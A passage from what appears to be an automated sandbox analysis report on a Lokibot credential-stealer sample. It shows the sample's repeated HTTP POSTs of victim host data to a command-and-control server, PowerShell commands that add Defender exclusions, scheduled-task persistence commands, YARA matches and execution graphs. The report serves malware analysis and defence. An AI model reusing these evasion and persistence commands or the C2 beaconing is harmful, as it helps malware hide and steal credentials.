                              Jan 11, 2025 08:39:06.979552031 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:07.710124016 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:07 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              121192.168.2.95010194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:07.894459009 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:07.899333000 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:08.598738909 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:08 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              122192.168.2.95010294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:08.809762001 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:08.814631939 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:09.507545948 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:09 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              123192.168.2.95010394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:09.677052021 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:09.685224056 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:10.394455910 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:10 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              124192.168.2.95010494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:10.553579092 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:10.558443069 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:11.312309980 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:11 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              125192.168.2.95010594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:11.458076954 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:11.462948084 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:12.212040901 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:12 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:02:37:05
                              Start date:11/01/2025
                              Path:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\kzQ25HVUbf.exe"
                              Imagebase:0x8c0000
                              File size:559'616 bytes
                              MD5 hash:55550B1C9E27A22BC17744FC5CBA030C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:02:37:14
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"
                              Imagebase:0xe30000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:02:37:14
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:02:37:14
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
                              Imagebase:0xe30000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:02:37:14
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:02:37:14
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"
                              Imagebase:0xb60000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:02:37:14
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:02:37:15
                              Start date:11/01/2025
                              Path:C:\Users\user\Desktop\kzQ25HVUbf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\kzQ25HVUbf.exe"
                              Imagebase:0x8a0000
                              File size:559'616 bytes
                              MD5 hash:55550B1C9E27A22BC17744FC5CBA030C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.2599826516.0000000001078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Target ID:10
                              Start time:02:37:16
                              Start date:11/01/2025
                              Path:C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                              Imagebase:0x3c0000
                              File size:559'616 bytes
                              MD5 hash:55550B1C9E27A22BC17744FC5CBA030C
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:11
                              Start time:02:37:17
                              Start date:11/01/2025
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff72d8c0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:15
                              Start time:02:37:27
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"
                              Imagebase:0xb60000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:16
                              Start time:02:37:27
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:17
                              Start time:02:37:27
                              Start date:11/01/2025
                              Path:C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
                              Imagebase:0x350000
                              File size:559'616 bytes
                              MD5 hash:55550B1C9E27A22BC17744FC5CBA030C
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:02:37:27
                              Start date:11/01/2025
                              Path:C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
                              Imagebase:0xd80000
                              File size:559'616 bytes
                              MD5 hash:55550B1C9E27A22BC17744FC5CBA030C
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: Loki_1, Description: Loki Payload, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:7.7%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:38
                                Total number of Limit Nodes:7
                                execution_graph 15601 1284668 15602 128467a 15601->15602 15603 1284686 15602->15603 15605 1284778 15602->15605 15606 128479d 15605->15606 15610 1284878 15606->15610 15614 1284888 15606->15614 15612 1284888 15610->15612 15611 128498c 15611->15611 15612->15611 15618 12844b4 15612->15618 15615 12848af 15614->15615 15616 128498c 15615->15616 15617 12844b4 CreateActCtxA 15615->15617 15616->15616 15617->15616 15619 1285918 CreateActCtxA 15618->15619 15621 12859db 15619->15621 15622 128d478 15623 128d4be GetCurrentProcess 15622->15623 15625 128d509 15623->15625 15626 128d510 GetCurrentThread 15623->15626 15625->15626 15627 128d54d GetCurrentProcess 15626->15627 15628 128d546 15626->15628 15629 128d583 15627->15629 15628->15627 15630 128d5ab GetCurrentThreadId 15629->15630 15631 128d5dc 15630->15631 15632 128acf0 15636 128ade8 15632->15636 15641 128add8 15632->15641 15633 128acff 15637 128ae1c 15636->15637 15638 128adf9 15636->15638 15637->15633 15638->15637 15639 128b020 GetModuleHandleW 15638->15639 15640 128b04d 15639->15640 15640->15633 15642 128ae1c 15641->15642 15643 128adf9 15641->15643 15642->15633 15643->15642 15644 128b020 GetModuleHandleW 15643->15644 15645 128b04d 15644->15645 15645->15633 15646 128d6c0 DuplicateHandle 15647 128d756 15646->15647

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 450 a7d04d0-a7d04f9 451 a7d0558-a7d0568 450->451 452 a7d04fb-a7d051c 450->452 455 a7d073e-a7d0745 451->455 456 a7d056e-a7d0578 451->456 452->451 457 a7d051e-a7d0524 452->457 460 a7d0754-a7d0767 455->460 461 a7d0747-a7d074f call a7d0348 455->461 458 a7d057a-a7d0581 456->458 459 a7d0582-a7d058c 456->459 462 a7d0526-a7d0528 457->462 463 a7d0532-a7d0537 457->463 467 a7d0771-a7d0780 459->467 468 a7d0592-a7d05d2 459->468 461->460 462->463 465 a7d0539-a7d053d 463->465 466 a7d0544-a7d0551 463->466 465->466 466->451 472 a7d0782-a7d07e4 467->472 478 a7d05ea-a7d05ee 468->478 479 a7d05d4-a7d05da 468->479 501 a7d07e6-a7d0812 472->501 483 a7d061b-a7d0633 call a7d0338 478->483 484 a7d05f0-a7d0615 478->484 481 a7d05dc 479->481 482 a7d05de-a7d05e0 479->482 481->478 482->478 493 a7d0635-a7d063a 483->493 494 a7d0640-a7d0648 483->494 484->483 493->494 495 a7d065e-a7d067d 494->495 496 a7d064a-a7d0658 494->496 502 a7d067f-a7d0685 495->502 503 a7d0695-a7d0699 495->503 496->495 506 a7d0819-a7d084f 501->506 507 a7d0814 501->507 508 a7d0689-a7d068b 502->508 509 a7d0687 502->509 504 a7d069b-a7d06a8 503->504 505 a7d06f2-a7d073b 503->505 515 a7d06de-a7d06eb 504->515 516 a7d06aa-a7d06dc 504->516 505->455 517 a7d0859-a7d0864 506->517 518 a7d0851 506->518 507->506 508->503 509->503 515->505 516->515 525 a7d091a-a7d0927 517->525 526 a7d086a-a7d087b call a7d0358 517->526 518->517 527 a7d093f-a7d0945 525->527 528 a7d0929-a7d0938 525->528 533 a7d0881-a7d089d 526->533 534 a7d0903-a7d090b 526->534 528->527 539 a7d089f-a7d08a6 call a7d0364 533->539 540 a7d08b1 533->540 534->525 536 a7d090d-a7d0910 534->536 536->525 542 a7d08b3-a7d08b5 539->542 540->542 542->534 544 a7d08b7-a7d08d6 call a7d0374 542->544 544->534 549 a7d08d8-a7d08df 544->549 549->534 550 a7d08e1-a7d08fe call a7d0380 549->550 550->534
                                Memory Dump Source
                                • Source File: 00000000.00000002.1475175249.000000000A7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A7D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a7d0000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c6d5a514ac948bf5b32f1b31128f7e5cdf0516ac4e863f813ce611ebac74ac8
                                • Instruction ID: 517537c625e230606a8fc06abe75cf2cdf52516f1e7ecdc288b66eec3829d6cd
                                • Opcode Fuzzy Hash: 4c6d5a514ac948bf5b32f1b31128f7e5cdf0516ac4e863f813ce611ebac74ac8
                                • Instruction Fuzzy Hash: 8CE16C74B112089FDB14DFA8D954BAEBBF6EF88300F158069E506AB3A1CB74DD46CB50

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0128D4F6
                                • GetCurrentThread.KERNEL32 ref: 0128D533
                                • GetCurrentProcess.KERNEL32 ref: 0128D570
                                • GetCurrentThreadId.KERNEL32 ref: 0128D5C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 5e6a675e792cf5e2f73ae8b8de846b85a534472bb7b13b76f39ef1c0447d3a73
                                • Instruction ID: 9cac79516b12a9637df0c3c97d1e006c9cfe21831d425bb371d563540cb5e2c9
                                • Opcode Fuzzy Hash: 5e6a675e792cf5e2f73ae8b8de846b85a534472bb7b13b76f39ef1c0447d3a73
                                • Instruction Fuzzy Hash: E55188B09117498FEB14DFAAD548BAEBBF1FF88304F20855AD009A73A0D7749948CF25

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0128D4F6
                                • GetCurrentThread.KERNEL32 ref: 0128D533
                                • GetCurrentProcess.KERNEL32 ref: 0128D570
                                • GetCurrentThreadId.KERNEL32 ref: 0128D5C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: cf10b4b99bfc1991b0db1adee298b2e01d45556aa183662db5fa14cd2ad6c920
                                • Instruction ID: 6e92c0bc6bc6cbb822ad5d2d22ee912b755c213cd1886a391cc482a7e9b511e4
                                • Opcode Fuzzy Hash: cf10b4b99bfc1991b0db1adee298b2e01d45556aa183662db5fa14cd2ad6c920
                                • Instruction Fuzzy Hash: BF5188B09117498FEB14DFAAD548BAEBBF1FF48304F20855AD009A7390D7749948CF65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 44 128ade8-128adf7 45 128adf9-128ae06 call 1289414 44->45 46 128ae23-128ae27 44->46 51 128ae08 45->51 52 128ae1c 45->52 48 128ae29-128ae33 46->48 49 128ae3b-128ae7c 46->49 48->49 55 128ae89-128ae97 49->55 56 128ae7e-128ae86 49->56 99 128ae0e call 128b070 51->99 100 128ae0e call 128b080 51->100 52->46 57 128ae99-128ae9e 55->57 58 128aebb-128aebd 55->58 56->55 60 128aea9 57->60 61 128aea0-128aea7 call 128a150 57->61 63 128aec0-128aec7 58->63 59 128ae14-128ae16 59->52 62 128af58-128b018 59->62 65 128aeab-128aeb9 60->65 61->65 94 128b01a-128b01d 62->94 95 128b020-128b04b GetModuleHandleW 62->95 66 128aec9-128aed1 63->66 67 128aed4-128aedb 63->67 65->63 66->67 69 128aee8-128aef1 call 128a160 67->69 70 128aedd-128aee5 67->70 75 128aefe-128af03 69->75 76 128aef3-128aefb 69->76 70->69 77 128af21-128af2e 75->77 78 128af05-128af0c 75->78 76->75 85 128af30-128af4e 77->85 86 128af51-128af57 77->86 78->77 80 128af0e-128af1e call 128a170 call 128a180 78->80 80->77 85->86 94->95 96 128b04d-128b053 95->96 97 128b054-128b068 95->97 96->97 99->59 100->59
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0128B03E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1444120047.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1280000_kzQ25HVUbf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
